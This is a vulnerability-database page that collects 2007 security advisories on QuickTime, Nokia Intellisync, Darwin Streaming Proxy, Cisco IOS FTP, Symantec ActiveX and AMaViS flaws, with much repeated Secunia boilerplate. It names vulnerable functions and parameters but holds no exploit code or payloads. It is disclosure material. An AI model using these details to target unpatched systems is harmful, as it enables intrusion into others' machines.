VARIoT IoT vulnerabilities database
| VAR-200705-0153 | CVE-2007-0754 | Apple QuickTime Heap-based buffer overflow vulnerability |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Heap-based buffer overflow in Apple QuickTime before 7.1.3 allows user-assisted remote attackers to execute arbitrary code via a crafted Sample Table Sample Descriptor (STSD) atom size in a QuickTime movie. Apple QuickTime is prone to a heap-based buffer-overflow issue because it fails to properly check boundaries on user-supplied data before copying it into an insuficiently sized memory buffer.
An attacker may exploit this issue by enticing victims into opening a maliciously crafted 'MOV' QuickTime movie file.
Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the user running the application. Failed exploit attempts likely result in denial-of-service conditions.
Versions of QuickTime 7 prior to 7.1.3 are vulnerable. Apple QuickTime is a popular multimedia player that supports a wide variety of media formats. There is a heap overflow vulnerability in QuickTime when parsing malformed STSD elements. If an attacker specifies a malicious element size, a heap overflow may be triggered when parsing a MOV file, resulting in arbitrary instruction execution. TPTI-07-07: Apple QuickTime STSD Parsing Heap Overflow Vulnerability
http://dvlabs.tippingpoint.com/advisory/TPTI-07-07
May 10, 2007
-- CVE ID:
CVE-2007-0754
-- Affected Vendor:
Apple
-- Affected Products:
QuickTime Player 7.x
-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability since January 31, 2006 by Digital Vaccine protection
filter ID 4109. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.
The specific flaw exists within the parsing of malformed Sample Table
Sample Descriptor (STSD) atoms. Specifying a malicious atom size can
result in an under allocated heap chunk and subsequently an exploitable
heap corruption.
-- Vendor Response:
Apple has issued an update to correct this vulnerability. More details
can be found at:
http://docs.info.apple.com/article.html?artnum=304357
-- Disclosure Timeline:
2006.06.16 - Vulnerability reported to vendor
2006.01.31 - Digital Vaccine released to TippingPoint customers
2007.05.10 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by Ganesh Devarajan,
TippingPoint DVLabs
| VAR-200705-0287 | CVE-2007-2590 | Nokia Intellisync Mobile Suite Vulnerabilities that collect important information |
CVSS V2: 6.4 CVSS V3: - Severity: MEDIUM |
Nokia Intellisync Mobile Suite 6.4.31.2, 6.6.0.107, and 6.6.2.2, possibly involving Novell Groupwise Mobile Server and Nokia Intellisync Wireless Email Express, allows remote attackers to obtain user names and other sensitive information via a direct request to (1) usrmgr/userList.asp or (2) usrmgr/userStatusList.asp. Intellisync Mobile Suite is prone to a information disclosure vulnerability.
----------------------------------------------------------------------
Try a new way to discover vulnerabilities that ALREADY EXIST in your
IT infrastructure.
Join the FREE BETA test of the Network Software Inspector (NSI)!
http://secunia.com/network_software_inspector/
The NSI enables you to INSPECT, DISCOVER, and DOCUMENT
vulnerabilities in more than 4,000 different Windows applications.
----------------------------------------------------------------------
TITLE:
Nokia Intellisync Mobile Suite Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA25212
VERIFY ADVISORY:
http://secunia.com/advisories/25212/
CRITICAL:
Moderately critical
IMPACT:
Cross Site Scripting, Exposure of system information, Exposure of
sensitive information, DoS
WHERE:
>From remote
SOFTWARE:
Intellisync Mobile Suite
http://secunia.com/product/3450/
DESCRIPTION:
Johannes Greil has reported some vulnerabilities in Nokia's
Intellisync Mobile Suite, which can be exploited by malicious people
to gain knowledge of sensitive information, conduct cross-site
scripting attacks, manipulate certain data, or cause a DoS (Denial of
Service).
1) Missing authentication checks within certain ASP scripts (e.g.
userList.asp, userStatusList.asp) can be exploited to modify or gain
knowledge of certain user details, or to disable user accounts.
2) Certain input passed to de/pda/dev_logon.asp,
usrmgr/registerAccount.asp, and de/create_account.asp is not properly
sanitised before being returned to the user. This can be exploited to
execute arbitrary HTML and script code in a user's browser session in
context of an affected site.
3) An error within the bundled Apache Tomcat server can be exploited
to disclose directory listings and script source codes.
The vulnerabilities are reported in versions 6.4.31.2, 6.6.0.107, and
6.6.2.2 and is reported to partially affect Nokia Intellisync Wireless
Email Express. Other versions may also be affected.
SOLUTION:
Upgrade to GMS 2.
PROVIDED AND/OR DISCOVERED BY:
Johannes Greil, SEC Consult
ORIGINAL ADVISORY:
http://www.sec-consult.com/289.html
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-200705-0288 | CVE-2007-2591 | Nokia Intellisync Mobile Suite Such as usrmgr/userList.asp Vulnerability in changing user account |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
usrmgr/userList.asp in Nokia Intellisync Mobile Suite 6.4.31.2, 6.6.0.107, and 6.6.2.2, possibly involving Novell Groupwise Mobile Server and Nokia Intellisync Wireless Email Express, allows remote attackers to modify user account details and cause a denial of service (account deactivation) via the userid parameter in an update action. Intellisync Mobile Suite is prone to a denial-of-service vulnerability.
----------------------------------------------------------------------
Try a new way to discover vulnerabilities that ALREADY EXIST in your
IT infrastructure.
Join the FREE BETA test of the Network Software Inspector (NSI)!
http://secunia.com/network_software_inspector/
The NSI enables you to INSPECT, DISCOVER, and DOCUMENT
vulnerabilities in more than 4,000 different Windows applications.
----------------------------------------------------------------------
TITLE:
Nokia Intellisync Mobile Suite Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA25212
VERIFY ADVISORY:
http://secunia.com/advisories/25212/
CRITICAL:
Moderately critical
IMPACT:
Cross Site Scripting, Exposure of system information, Exposure of
sensitive information, DoS
WHERE:
>From remote
SOFTWARE:
Intellisync Mobile Suite
http://secunia.com/product/3450/
DESCRIPTION:
Johannes Greil has reported some vulnerabilities in Nokia's
Intellisync Mobile Suite, which can be exploited by malicious people
to gain knowledge of sensitive information, conduct cross-site
scripting attacks, manipulate certain data, or cause a DoS (Denial of
Service).
1) Missing authentication checks within certain ASP scripts (e.g.
userList.asp, userStatusList.asp) can be exploited to modify or gain
knowledge of certain user details, or to disable user accounts.
2) Certain input passed to de/pda/dev_logon.asp,
usrmgr/registerAccount.asp, and de/create_account.asp is not properly
sanitised before being returned to the user. This can be exploited to
execute arbitrary HTML and script code in a user's browser session in
context of an affected site.
3) An error within the bundled Apache Tomcat server can be exploited
to disclose directory listings and script source codes.
The vulnerabilities are reported in versions 6.4.31.2, 6.6.0.107, and
6.6.2.2 and is reported to partially affect Nokia Intellisync Wireless
Email Express. Other versions may also be affected.
SOLUTION:
Upgrade to GMS 2.
PROVIDED AND/OR DISCOVERED BY:
Johannes Greil, SEC Consult
ORIGINAL ADVISORY:
http://www.sec-consult.com/289.html
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-200705-0148 | CVE-2007-0749 | Apple Darwin Streaming Proxy of is_command Stack-based buffer overflow vulnerability in functions |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Multiple stack-based buffer overflows in the is_command function in proxy.c in Apple Darwin Streaming Proxy, when using Darwin Streaming Server before 5.5.5, allow remote attackers to execute arbitrary code via a long (1) cmd or (2) server value in an RTSP request.
An attacker can exploit these issues to execute arbitrary code with superuser privileges. Successfully exploiting this issue will result in the complete compromise of affected computers. Failed exploit attempts will result in a denial of service.
These issues affect versions prior to 5.5.5.
----------------------------------------------------------------------
Try a new way to discover vulnerabilities that ALREADY EXIST in your
IT infrastructure.
Join the FREE BETA test of the Network Software Inspector (NSI)!
http://secunia.com/network_software_inspector/
The NSI enables you to INSPECT, DISCOVER, and DOCUMENT
vulnerabilities in more than 4,000 different Windows applications.
SOLUTION:
Update to version 5.5.5.
http://developer.apple.com/opensource/server/streaming/index.html
PROVIDED AND/OR DISCOVERED BY:
An anonymous person, reported via iDefense Labs.
ORIGINAL ADVISORY:
Apple:
http://docs.info.apple.com/article.html?artnum=305495
iDefense Labs:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=533
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. Apple Darwin Streaming Proxy Multiple Vulnerabilities
iDefense Security Advisory 05.10.07
http://labs.idefense.com/intelligence/vulnerabilities/
May 10, 2007
I. BACKGROUND
Darwin Streaming Server is a server technology that facilitates
streaming of QuickTime data to clients across the Internet using the
industry standard RTP and RTSP protocols.
The Darwin Streaming Proxy is an application-specific proxy which would
normally be run in a border zone or perimeter network. It is used to
give client machines, within a protected network, access to streaming
servers where the firewall blocks RTSP connections or RTP/UDP data
flow. For more information, please visit the product website at via
following URL.
http://developer.apple.com/opensource/server/streaming/index.html
II.
Due to insufficient sanity checking, a stack-based buffer overflow could
occur while trying to extract commands from the request buffer. The
"is_command" function, located in proxy.c, lacks bounds checking when
filling the 'cmd' and 'server' buffers.
Additionally, a heap-based buffer overflow could occur while processing
the "trackID" values contained within a "SETUP" request. If a request
with more than 32 values is encountered, memory corruption will occur.
III.
No credentials are required for accessing the vulnerable code.
The stack-based buffer overflow vulnerability relies on compiler
optimizations. iDefense has verified the Darwin Streaming Proxy 4.1
binary release for Fedora Core is not vulnerable. The binary produced
from a out-of-the-box compile on Fedora was confirmed vulnerable.
IV. DETECTION
iDefense has confirmed the existence of these vulnerabilities in Darwin
Streaming Server 5.5.4 and Darwin Streaming Proxy 4.1.
V. WORKAROUND
Employ firewalls, access control lists or other TCP/UDP restriction
mechanisms to limit access to vulnerable systems and services.
VI. VENDOR RESPONSE
Apple has addressed this vulnerability by releasing version
5.5.5 of Darwin Streaming Server. More information can be found from
Apple's Security Update page or the Darwin Streaming Server advisory
page at the respective URLs below.
http://docs.info.apple.com/article.html?artnum=61798
http://docs.info.apple.com/article.html?artnum=305495
VII. CVE INFORMATION
The Common Vulnerabilities and Exposures (CVE) project has assigned the
name
CVE-2007-0748 to the heap-based buffer overflow and CVE-2007-0749 to
stack-based
buffer overflow. These names are a candidate for inclusion in the CVE list
(http://cve.mitre.org/), which standardizes names for security problems.
VIII. DISCLOSURE TIMELINE
04/09/2007 Initial vendor notification
04/09/2007 Initial vendor response
05/10/2007 Coordinated public disclosure
IX. CREDIT
The discoverer of this vulnerability wishes to remain anonymous.
Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php
Free tools, research and upcoming events
http://labs.idefense.com/
X. LEGAL NOTICES
Copyright \xa9 2007 iDefense, Inc.
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
| VAR-200705-0147 | CVE-2007-0748 | Apple Darwin Streaming Proxy Vulnerable to heap-based buffer overflow |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Heap-based buffer overflow in Apple Darwin Streaming Proxy, when using Darwin Streaming Server before 5.5.5, allows remote attackers to execute arbitrary code via multiple trackID values in a SETUP RTSP request.
An attacker can exploit these issues to execute arbitrary code with superuser privileges. Successfully exploiting this issue will result in the complete compromise of affected computers. Failed exploit attempts will result in a denial of service.
These issues affect versions prior to 5.5.5.
----------------------------------------------------------------------
Try a new way to discover vulnerabilities that ALREADY EXIST in your
IT infrastructure.
Join the FREE BETA test of the Network Software Inspector (NSI)!
http://secunia.com/network_software_inspector/
The NSI enables you to INSPECT, DISCOVER, and DOCUMENT
vulnerabilities in more than 4,000 different Windows applications.
SOLUTION:
Update to version 5.5.5.
http://developer.apple.com/opensource/server/streaming/index.html
PROVIDED AND/OR DISCOVERED BY:
An anonymous person, reported via iDefense Labs.
ORIGINAL ADVISORY:
Apple:
http://docs.info.apple.com/article.html?artnum=305495
iDefense Labs:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=533
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. BACKGROUND
Darwin Streaming Server is a server technology that facilitates
streaming of QuickTime data to clients across the Internet using the
industry standard RTP and RTSP protocols.
The Darwin Streaming Proxy is an application-specific proxy which would
normally be run in a border zone or perimeter network. It is used to
give client machines, within a protected network, access to streaming
servers where the firewall blocks RTSP connections or RTP/UDP data
flow. For more information, please visit the product website at via
following URL.
http://developer.apple.com/opensource/server/streaming/index.html
II.
Due to insufficient sanity checking, a stack-based buffer overflow could
occur while trying to extract commands from the request buffer. The
"is_command" function, located in proxy.c, lacks bounds checking when
filling the 'cmd' and 'server' buffers.
Additionally, a heap-based buffer overflow could occur while processing
the "trackID" values contained within a "SETUP" request. If a request
with more than 32 values is encountered, memory corruption will occur.
III.
No credentials are required for accessing the vulnerable code.
The stack-based buffer overflow vulnerability relies on compiler
optimizations. iDefense has verified the Darwin Streaming Proxy 4.1
binary release for Fedora Core is not vulnerable. The binary produced
from a out-of-the-box compile on Fedora was confirmed vulnerable.
IV.
V. WORKAROUND
Employ firewalls, access control lists or other TCP/UDP restriction
mechanisms to limit access to vulnerable systems and services.
VI. More information can be found from
Apple's Security Update page or the Darwin Streaming Server advisory
page at the respective URLs below.
http://docs.info.apple.com/article.html?artnum=61798
http://docs.info.apple.com/article.html?artnum=305495
VII. CVE INFORMATION
The Common Vulnerabilities and Exposures (CVE) project has assigned the
name
CVE-2007-0748 to the heap-based buffer overflow and CVE-2007-0749 to
stack-based
buffer overflow. These names are a candidate for inclusion in the CVE list
(http://cve.mitre.org/), which standardizes names for security problems.
VIII. DISCLOSURE TIMELINE
04/09/2007 Initial vendor notification
04/09/2007 Initial vendor response
05/10/2007 Coordinated public disclosure
IX. CREDIT
The discoverer of this vulnerability wishes to remain anonymous.
Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php
Free tools, research and upcoming events
http://labs.idefense.com/
X. LEGAL NOTICES
Copyright \xa9 2007 iDefense, Inc.
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
| VAR-200705-0283 | CVE-2007-2586 |
Cisco IOS of FTP Authentication bypass vulnerability in the server
Related entries in the VARIoT exploits database: VAR-E-200705-0357 |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
The FTP Server in Cisco IOS 11.3 through 12.4 does not properly check user authorization, which allows remote attackers to execute arbitrary code, and have other impact including reading startup-config, as demonstrated by a crafted MKD command that involves access to a VTY device and overflows a buffer, aka bug ID CSCek55259. Cisco IOS FTP Server is prone to multiple vulnerabilities including a denial-of-service issue and an authentication-bypass issue.
Attackers can exploit these issues to deny service to legitimate users, gain unauthorized access to an affected device, or execute arbitrary code.
Only IOS devices that have the FTP Server feature enabled are vulnerable; this feature is disabled by default. Cisco IOS is the operating system used by Cisco networking equipment.
----------------------------------------------------------------------
Try a new way to discover vulnerabilities that ALREADY EXIST in your
IT infrastructure.
Join the FREE BETA test of the Network Software Inspector (NSI)!
http://secunia.com/network_software_inspector/
The NSI enables you to INSPECT, DISCOVER, and DOCUMENT
vulnerabilities in more than 4,000 different Windows applications.
----------------------------------------------------------------------
TITLE:
Cisco IOS FTP Server Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA25199
VERIFY ADVISORY:
http://secunia.com/advisories/25199/
CRITICAL:
Moderately critical
IMPACT:
Security Bypass, DoS, System access
WHERE:
>From remote
OPERATING SYSTEM:
Cisco IOS 12.x
http://secunia.com/product/182/
Cisco IOS 11.x
http://secunia.com/product/183/
DESCRIPTION:
Some vulnerabilities have been reported in Cisco IOS, which can be
exploited by malicious users and malicious people to bypass certain
security restrictions, cause a DoS (Denial of Service), or
potentially compromise a vulnerable system.
2) An unspecified error exists when transferring files via FTP, which
can be exploited to cause a DoS (Denial of Service).
Successful exploitation may allow an attacker to retrieve any file
from an affected system (including startup-config), cause IOS to
reload, and potentially execute arbitrary code, but requires that the
FTP server is enabled, which is not the default setting.
SOLUTION:
The vendor has issued an update that removes the FTP server ability.
As a workaround, it is possible to disable the FTP server by
executing the following command in configuration mode: "no ftp-server
enable". See vendor advisories for more details.
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/en/US/products/products_applied_intelligence_response09186a00808399ea.html
http://www.cisco.com/en/US/products/products_security_advisory09186a00808399d0.shtml
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-200705-0289 | CVE-2007-2592 | Nokia Intellisync Mobile Suite Cross-site scripting vulnerability |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Multiple cross-site scripting (XSS) vulnerabilities in Nokia Intellisync Mobile Suite 6.4.31.2, 6.6.0.107, and 6.6.2.2, possibly involving Novell Groupwise Mobile Server and Nokia Intellisync Wireless Email Express, allow remote attackers to inject arbitrary web script or HTML via the (1) username parameter to de/pda/dev_logon.asp and (2) multiple unspecified vectors in (a) usrmgr/registerAccount.asp, (b) de/create_account.asp, and other files. (1) de/pda/dev_logon.asp To username Parameters (2) usrmgr/registerAccount.asp , de/create_account.asp Etc. Routes in unspecified files . Reports indicate that these issues reside only in the bundled package; Nokia Intellisync Mobile Suite may not be affected on its own.
Successful attacks may allow an attacker to obtain sensitive information and carry out denial-of-service and cross-site scripting attacks.
----------------------------------------------------------------------
Try a new way to discover vulnerabilities that ALREADY EXIST in your
IT infrastructure.
Join the FREE BETA test of the Network Software Inspector (NSI)!
http://secunia.com/network_software_inspector/
The NSI enables you to INSPECT, DISCOVER, and DOCUMENT
vulnerabilities in more than 4,000 different Windows applications.
----------------------------------------------------------------------
TITLE:
Nokia Intellisync Mobile Suite Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA25212
VERIFY ADVISORY:
http://secunia.com/advisories/25212/
CRITICAL:
Moderately critical
IMPACT:
Cross Site Scripting, Exposure of system information, Exposure of
sensitive information, DoS
WHERE:
>From remote
SOFTWARE:
Intellisync Mobile Suite
http://secunia.com/product/3450/
DESCRIPTION:
Johannes Greil has reported some vulnerabilities in Nokia's
Intellisync Mobile Suite, which can be exploited by malicious people
to gain knowledge of sensitive information, conduct cross-site
scripting attacks, manipulate certain data, or cause a DoS (Denial of
Service).
1) Missing authentication checks within certain ASP scripts (e.g.
userList.asp, userStatusList.asp) can be exploited to modify or gain
knowledge of certain user details, or to disable user accounts.
2) Certain input passed to de/pda/dev_logon.asp,
usrmgr/registerAccount.asp, and de/create_account.asp is not properly
sanitised before being returned to the user. This can be exploited to
execute arbitrary HTML and script code in a user's browser session in
context of an affected site.
3) An error within the bundled Apache Tomcat server can be exploited
to disclose directory listings and script source codes.
The vulnerabilities are reported in versions 6.4.31.2, 6.6.0.107, and
6.6.2.2 and is reported to partially affect Nokia Intellisync Wireless
Email Express. Other versions may also be affected.
SOLUTION:
Upgrade to GMS 2.
PROVIDED AND/OR DISCOVERED BY:
Johannes Greil, SEC Consult
ORIGINAL ADVISORY:
http://www.sec-consult.com/289.html
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-200705-0001 | CVE-2006-3456 | Norton AntiVirus Used in etc. Symantec NAVOPTS.DLL ActiveX Control crash vulnerability in control |
CVSS V2: 8.5 CVSS V3: - Severity: HIGH |
The Symantec NAVOPTS.DLL ActiveX control (aka Symantec.Norton.AntiVirus.NAVOptions) 12.2.0.13, as used in Norton AntiVirus, Internet Security, and System Works 2005 and 2006, is designed for use only in application-embedded web browsers, which allows remote attackers to "crash the control" via unspecified vectors related to content on a web site, and place Internet Explorer into a "defunct state" in which remote attackers can execute arbitrary code in addition to other Symantec ActiveX controls, regardless of whether they are marked safe for scripting. NOTE: this CVE was inadvertently used for an E-mail Auto-Protect issue, but that issue has been assigned CVE-2007-3771. (2) Internet Explorer The "defunc state" Regardless of the setting for whether scripting is safe or not. Symantec ActiveX An arbitrary code execution vulnerability exists with the control. This vulnerability E-mail Auto-Protect However, the problem is CVE-2007-3771 Has been assigned.A third party may be affected by: (1) " Crash control " There is a possibility that. (2) other Symantec ActiveX Arbitrary code, including controls, could be executed.
An attacker may exploit this issue by enticing victims into opening a maliciously crafted HTML document.
Successful exploits will allow attackers to execute arbitrary code in the context of the user visiting a malicious web page. Failed exploit attempts will likely result in denial-of-service conditions. Symantec Norton Internet Security 2006 COM Object Security ByPass
Vulnerability
iDefense Security Advisory 05.09.07
http://labs.idefense.com/intelligence/vulnerabilities/
May 09, 2007
I. BACKGROUND
Norton Internet Security 2006 is a comprehensive system security suite
that offers protection from spyware, viruses, identity theft, spam, and
malicious network traffic. More information can be found on the vendors
site at the following URL.
http://www.symantec.com/home_homeoffice/products/overview.jsp?pcid=is&pvid=nis2006
II. When this control is
loaded in a standard browser window, it throws an error during
initialization which leaves the browser in a defunct state. After the
error dialog displays, other Symantec ActiveX Controls can be created
without error even if they are not marked as safe for scripting. This
can lead to remote code execution if the unsafe controls contain
exploitable methods.
III.
IV. DETECTION
iDefense confirmed the existence of this vulnerability within version
12.2.0.13 of NavOpts.dll as distributed with Norton Internet Security
2006. Prior versions are suspected to be vulnerable.
V. Although this will prevent potential
exploitation, it may also negatively impact the functionality of the
application.
VI. VENDOR RESPONSE
Symantec has addressed this vulnerability with a software update. The
update is available via their LiveUpdate channels. For more
information, consult their advisory at the following URL.
http://www.symantec.com/avcenter/security/Content/2007.05.09.html
VII. CVE INFORMATION
The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2006-3456 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.
VIII. DISCLOSURE TIMELINE
12/13/2006 Initial vendor notification
12/13/2006 Initial vendor response
05/09/2007 Coordinated public disclosure
IX. CREDIT
This vulnerability was reported to iDefense by Peter Vreugdenhil.
Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php
Free tools, research and upcoming events
http://labs.idefense.com/
X. LEGAL NOTICES
Copyright \xa9 2007 iDefense, Inc.
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.
----------------------------------------------------------------------
Try a new way to discover vulnerabilities that ALREADY EXIST in your
IT infrastructure.
Join the FREE BETA test of the Network Software Inspector (NSI)!
http://secunia.com/network_software_inspector/
The NSI enables you to INSPECT, DISCOVER, and DOCUMENT
vulnerabilities in more than 4,000 different Windows applications.
This can be exploited to e.g.
Set the kill-bit for the affected ActiveX control.
PROVIDED AND/OR DISCOVERED BY:
Discovered by Peter Vreugdenhil and reported via iDefense Labs.
ORIGINAL ADVISORY:
Symantec:
http://www.symantec.com/avcenter/security/Content/2007.05.09.html
iDefense Labs:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=529
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-200705-0284 | CVE-2007-2587 |
Cisco IOS of FTP Service disruption due to unauthorized file transfer on server (DoS) Vulnerabilities
Related entries in the VARIoT exploits database: VAR-E-200705-0357 |
CVSS V2: 6.3 CVSS V3: - Severity: MEDIUM |
The IOS FTP Server in Cisco IOS 11.3 through 12.4 allows remote authenticated users to cause a denial of service (IOS reload) via unspecified vectors involving transferring files (aka bug ID CSCse29244). Cisco IOS FTP Server is prone to multiple vulnerabilities including a denial-of-service issue and an authentication-bypass issue.
Attackers can exploit these issues to deny service to legitimate users, gain unauthorized access to an affected device, or execute arbitrary code.
Only IOS devices that have the FTP Server feature enabled are vulnerable; this feature is disabled by default. Cisco IOS is the operating system used by Cisco networking equipment.
----------------------------------------------------------------------
Try a new way to discover vulnerabilities that ALREADY EXIST in your
IT infrastructure.
Join the FREE BETA test of the Network Software Inspector (NSI)!
http://secunia.com/network_software_inspector/
The NSI enables you to INSPECT, DISCOVER, and DOCUMENT
vulnerabilities in more than 4,000 different Windows applications.
1) An unspecified error exists in the IOS FTP server when verifying
user credentials, which can be exploited to bypass user
authentication.
Successful exploitation may allow an attacker to retrieve any file
from an affected system (including startup-config), cause IOS to
reload, and potentially execute arbitrary code, but requires that the
FTP server is enabled, which is not the default setting.
SOLUTION:
The vendor has issued an update that removes the FTP server ability.
As a workaround, it is possible to disable the FTP server by
executing the following command in configuration mode: "no ftp-server
enable". See vendor advisories for more details.
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/en/US/products/products_applied_intelligence_response09186a00808399ea.html
http://www.cisco.com/en/US/products/products_security_advisory09186a00808399d0.shtml
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-200705-0187 | CVE-2007-1673 | AMaViS Of multiple products used in unzoo.c Service disruption in (DoS) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
unzoo.c, as used in multiple products including AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file. The Zoo compression algorithm is prone to a remote denial-of-service vulnerability. This issue arises when applications implementing the Zoo algorithm process certain malformed archives.
